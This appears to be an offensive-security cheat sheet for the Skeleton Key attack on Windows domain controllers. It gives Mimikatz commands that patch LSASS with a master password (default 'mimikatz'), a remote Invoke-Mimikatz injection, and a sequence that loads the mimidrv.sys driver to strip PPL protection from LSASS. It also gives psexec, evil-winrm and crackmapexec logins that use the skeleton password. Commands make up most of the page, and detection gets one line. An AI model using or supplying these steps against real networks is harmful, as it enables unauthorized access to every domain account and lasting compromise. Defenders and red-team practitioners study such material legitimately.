Skip to main content

Overview

Patch LSASS on DC with master password. All users can authenticate with their real password OR the skeleton key. Does not survive DC reboot.

Mimikatz (On DC)

mimikatz # privilege::debug
mimikatz # misc::skeleton
Default skeleton key: mimikatz

Authenticate with Skeleton Key

# Any user with skeleton password
impacket-psexec DOMAIN/administrator:mimikatz@DC_IP
evil-winrm -i DC_IP -u administrator -p 'mimikatz'
crackmapexec smb DC_IP -u administrator -p 'mimikatz'
Original passwords still work too.

Remote Injection (Needs DA)

If you have code exec on DC:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC_HOSTNAME

Notes

  • Patches LSASS memory on DC — not persistent across reboots
  • All domain users affected
  • Original passwords still work
  • Default skeleton password: mimikatz
  • LSASS must not be running as Protected Process (PPL)
  • Detection: monitor LSASS memory modifications

If LSASS is Protected (PPL)

misc::skeleton has no /driver switch. To bypass PPL, load the mimikatz driver (!+) and strip protection from LSASS first, then inject:
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
!+ loads the mimidrv.sys kernel driver; !processprotect ... /remove removes the PPL flag from LSASS.

Quick Reference

TaskCommand
Injectmisc::skeleton (on DC)
Default passwordmimikatz
Loginimpacket-psexec DOMAIN/anyuser:mimikatz@DC
Survives rebootNo